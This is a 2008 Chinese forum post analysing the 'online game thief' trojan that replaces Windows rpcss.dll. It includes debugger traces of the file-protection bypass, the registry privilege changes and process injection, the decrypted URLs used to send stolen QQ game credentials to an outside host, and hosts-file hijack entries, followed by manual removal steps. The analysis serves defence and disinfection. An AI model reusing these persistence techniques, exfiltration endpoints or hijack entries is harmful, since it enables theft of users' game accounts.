找回密码
 注册

QQ登录

只需一步,快速开始

查看: 1180|回复: 2

分析替换系统“rpcss.dll”文件的病毒和解决办法

老主顾 发表于 2008-11-5 15:37:45 | 显示全部楼层 |阅读模式 来自 中国广西南宁

马上注册,结交更多好友,享用更多功能。

您需要 登录 才可以下载或查看,没有帐号?注册

x
英文名称:TrojanSpy.OnLineGames.iyo
中文名称:“网游窃贼”变种iyo
病毒长度:12060字节
病毒类型:木马
危险级别:★★
影响平台:Win 9X/ME/NT/2000/XP/2003
MD5 校验:c403b5d5ea1448efeb2d2ae71d41f5c3


============================================================================================
简单描述:
    该病毒会通过替换系统“rpcss.dll”文件来实现开机自启动。是一个专门窃取QQ网络游戏帐号的木马程序。同时,它还会窃取QQ网络游戏用户的密码保护资料。

中毒现象:
1、杀毒后系统不能上网。
2、杀毒后系统粘贴功能失效。
3、杀毒后系统任务栏上的部分信息不能正常显示。
4、杀毒后系统桌面程序“explorer.exe”启动非常慢,等好长时间才能显示出来桌面。
============================================================================================


病毒主程序“TrojanSpy.OnLineGames.iyo”部分的分析:
============================================================================================
加壳名称:Upack V0.37 -> Dwing *
采用高级语言编写。
入口:00002080
文件大小:12,060 字节。

释放恶意DLL组件:
ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~ddc967.tmp" 文件大小:34,816 字节,文件名称随机。

病毒主程序通过“rundll32.exe”进程调用运行病毒释放出来的DLL组件文件:
00402209    FF15 00204000   CALL DWORD PTR DS:[402000]               ; kernel32.CreateProcessA
0012FC18   00000000 |ModuleFileName = NULL
0012FC1C   0012FCB4 |CommandLine = "rundll32 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~ddc967.tmp INS C:\Documents and Settings\Administrator\桌面\new13.10260422.exe"
0012FC20   00000000 |pProcessSecurity = NULL
0012FC24   00000000 |pThreadSecurity = NULL
0012FC28   00000000 |InheritHandles = FALSE
0012FC2C   00000000 |CreationFlags = 0
0012FC30   00000000 |pEnvironment = NULL
0012FC34   00000000 |CurrentDir = NULL
0012FC38   0012FC44 |pStartupInfo = 0012FC44
0012FC3C   0012FC88 \pProcessInfo = 0012FC88

病毒主程序在被感染计算机系统中安装完毕后会自我删除。
============================================================================================


病毒释放组件“~ddc967.tmp”部分的分析:
============================================================================================
采用高级语言编写,可能加壳。
文件大小:34,816 字节。


该DLL组件一般会被插入到“explorer.exe”、“csrss.exe”、“svchost.exe”等系统进程,以及几乎所有用户级权限的进程中加载运行,并在被感染计算机系统的后台执行恶意操作,隐藏自我,防止被用户发现、被安全软件查杀。
-----------------------------------------------------------------------------
1、插入系统进程“csrss.exe”:
监视DLL组件是否被调用,如果发现不存在(发现被关闭掉)则重新调用,达到自我保护的目的。

2、插入系统进程“explorer.exe”:
调用病毒组件“C:\WINDOWS\system32\gdipro.dll”运行。躲避安全软件主动防御和监控等,达到自我保护的目的。

3、插入系统进程“svchost.exe”:
(1)、自我复制为“C:\WINDOWS\system32\gdipro.dll”
(2)、通过“sfc_os.dll”来去除系统“C:\WINDOWS\system32\rpcss.dll”文件的保护:
--------------------------------------------
10012D03    FF15 C0200110   CALL DWORD PTR DS:[<&KERNEL32.LoadLibrar>; kernel32.LoadLibraryA
0006F340   10012B2C \FileName = "sfc_os.dll"

10012D10    FF15 C4200110   CALL DWORD PTR DS:[<&KERNEL32.GetProcAdd>; kernel32.GetProcAddress
0006F33C   76C30000 |hModule = 76C30000 (sfc_os)
0006F340   00000005 \ProcNameOrOrdinal = #5

10012D38    FFD6            CALL ESI                                 ; sfc_os.#5
0006F338   00000000
0006F33C   0006F348 UNICODE "C:\WINDOWS\system32\rpcss.dll"
--------------------------------------------
(3)、用“DeleteFileA”删除系统文件“C:\WINDOWS\system32\..\ServicePackFiles\i386\rpcss.dll”和“C:\WINDOWS\system32\dllcache\rpcss.dll”。
(4)、用“MoveFileExA”移动系统文件“C:\WINDOWS\system32\rpcss.dll”到“C:\WINDOWS\system32\srpcss.dll”处。
10012E0D    FF15 BC200110   CALL DWORD PTR DS:[<&KERNEL32.MoveFileEx>; kernel32.MoveFileExA
0006F45C   0006F67C |ExistingName = "C:\WINDOWS\system32\rpcss.dll"
0006F460   0006F578 |NewName = "C:\WINDOWS\system32\srpcss.dll"
0006F464   00000001 \Flags = REPLACE_EXISTING
(5)、用病毒释放出来的DLL组件文件“C:\WINDOWS\system32\gdipro.dll”来替换系统文件“C:\WINDOWS\system32\rpcss.dll”。
(6)、用“GetFileTime”、“SetFileTime”获取系统文件时间并重新设置被病毒替换后的DLL组件文件“C:\WINDOWS\system32\rpcss.dll”的时间(创建和修改日期),达到更好的自我隐藏的目的。
(7)、释放DLL组件“C:\WINDOWS\system32\sys17002.dll”(文件大小:23,040 字节)。
(8)、用“GetFileTime”、“SetFileTime”获取系统文件时间并重新设置被病毒替换后的DLL组件文件“C:\WINDOWS\system32\sys17002.dll”的时间(创建和修改日期),达到更好的自我隐藏的目的。
(9)、提升服务的权限,把“NT AUTHORITY\NetworkService”改为最高权限“LocalSystem”:
--------------------------------------------
10013313    FF15 18200110   CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; ADVAPI32.RegOpenKeyExA
0006F754   80000002 |hKey = HKEY_LOCAL_MACHINE
0006F758   0006F770 |Subkey = "SYSTEM\CurrentControlSet\Services\rpcss"
0006F75C   00000000 |Reserved = 0
0006F760   000F003F |Access = KEY_ALL_ACCESS
0006F764   0006F878 \pHandle = 0006F878

10013340    FFD7            CALL EDI                                 ; ADVAPI32.RegSetValueExA
0006F74C   10013342 /CALL 到 RegSetValueExA 来自 gdipro.10013340
0006F750   00000080 |hKey = 80
0006F754   10012C30 |ValueName = "ObjectName"
0006F758   00000000 |Reserved = 0
0006F75C   00000002 |ValueType = REG_EXPAND_SZ
0006F760   10012C3C |Buffer = gdipro.10012C3C(LocalSystem)
0006F764   0000000C \BufSize = C (12.)

10013352    FF15 10200110   CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; ADVAPI32.RegOpenKeyA
0006F75C   00000080 |hKey = 80
0006F760   10012C24 |Subkey = "Parameters"
0006F764   0006F874 \pHandle = 0006F874

10013372    FFD7            CALL EDI                                 ; ADVAPI32.RegSetValueExA
0006F74C   10013374 /CALL 到 RegSetValueExA 来自 gdipro.10013372
0006F750   00000084 |hKey = 84
0006F754   10012C18 |ValueName = "ServiceDll"
0006F758   00000000 |Reserved = 0
0006F75C   00000002 |ValueType = REG_EXPAND_SZ
0006F760   10011404 |Buffer = gdipro.10011404(C:\WINDOWS\system32\rpcss.dll)
0006F764   00000038 \BufSize = 38 (56.)
--------------------------------------------
(10)、“CreateRemoteThread”利用创建远线程的方式来调用运行“C:\WINDOWS\system32\gdipro.dll”。
-----------------------------------------------------------------------------

该病毒利用进程守护功能来实现自我保护。
============================================================================================


病毒释放组件“sys17002.dll”部分的分析:
============================================================================================
加壳名称:dUP v2.x Patcher --> www.diablo2oo2.cjb.net *
采用高级语言编写。
文件大小:34,816 字节。


释放驱动文件“C:\WINDOWS\system32\drivers\hm17002.sys” ->文件大小:5,120 字节。

创建病毒配置文件“C:\WINDOWS\system32\sys17002.add”。

发现地址加密前:ASCII "7a^G?BBBaaa^3>"
发现地址解密后:ASCII "g1.worrr111.cn"

发信地址:
http://g1.worrr111.cn/1a/zz4/zz. ... mp;d50=&d90=100
Game=17&d00=%s&d01=%s&d10=%s&d11=%s&d21=%s&d30=%s&d31=%s&d32=%s&d40=%u&d45=%u&d42=%u&d70=%d&d71=%d&d50=%s&d90=%d
http://g1.worrr111.cn/1a/zz4/mibao.asp?
Game=17&d10=%s&d11=%s&d00=%s&d01=%s&d20=%s:%s%%20%s:%s%%20%s:%s&d70=%d&d90=%d
act=&d10=%s&d80=%d

盗网络游戏帐号“QQ华夏”、“地下城与勇士”:
QQLogin.exe
DNF.exe

盗取QQ网络游戏的密码保护等信息资料。

域名劫持(当用户访问如下网站时,会被定向到骇客服务器地址“212.103.11.59”上):
\drivers\etc\hosts
212.103.11.59\tpassport.wanmei.com
212.103.11.59\treg.163.com
212.103.11.59\tsde.game.sohu.com
212.103.11.59\taccount.ztgame.com
212.103.11.59\tpwd.sdo.com
212.103.11.59\treg.91.com
============================================================================================


病毒释放驱动“hm17002.sys”部分的分析:
============================================================================================
恶意驱动程序。
文件大小:5,120 字节。


可能是利用驱动安装钩子截取QQ网络游戏密码,达到盗取游戏帐号的目的:
!This program cannot be run in DOS mode.
e:\qqsg\setloa~1\setloa~1\objfre_wnet_x86\i386\SetLoadHook.pdb
============================================================================================


============================================================================================
手动删除该病毒的方法步骤(经过实际测试绝对有效):

1、删除病毒文件“C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~*.tmp”、“C:\WINDOWS\system32 \gdipro.dll”、“C:\WINDOWS\system32\drivers\hm17002.sys”、“C:\WINDOWS \system32\sys17002.dll”、“C:\WINDOWS\system32\sys17002.add”、“C:\WINDOWS \system32\rpcss.dll”


2、把系统文件“C:\WINDOWS\system32\srpcss.dll”改名为“C:\WINDOWS\system32\rpcss.dll”。


3、把注册表“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\rpcss\ObjectName”键值改为“NT AUTHORITY\NetworkService”。


4、把注册表“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\rpcss\Parameters\ServiceDll”键值改为“%SystemRoot%\system32\rpcss.dll”。


5、重新启动计算机系统,系统杀毒修复完毕(系统重新启动后就可以上网了,粘贴功能有效了,同时任务栏的显示也正常了)。


6、使用杀毒软件进行全盘查杀病毒(该病毒为木马下载器下载到您计算机中的病毒,那个木马下载器还下载了N多其它病毒也同时安装到了您的计算机系统中)。
无名大 发表于 2008-11-26 21:13:50 | 显示全部楼层 来自 中国吉林长春
ggfgdgdgd
回复 支持 反对

使用道具 举报

dqmg507 发表于 2009-1-18 21:24:53 | 显示全部楼层 来自 中国四川德阳
这毒很强,很隐蔽,很佩服!
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表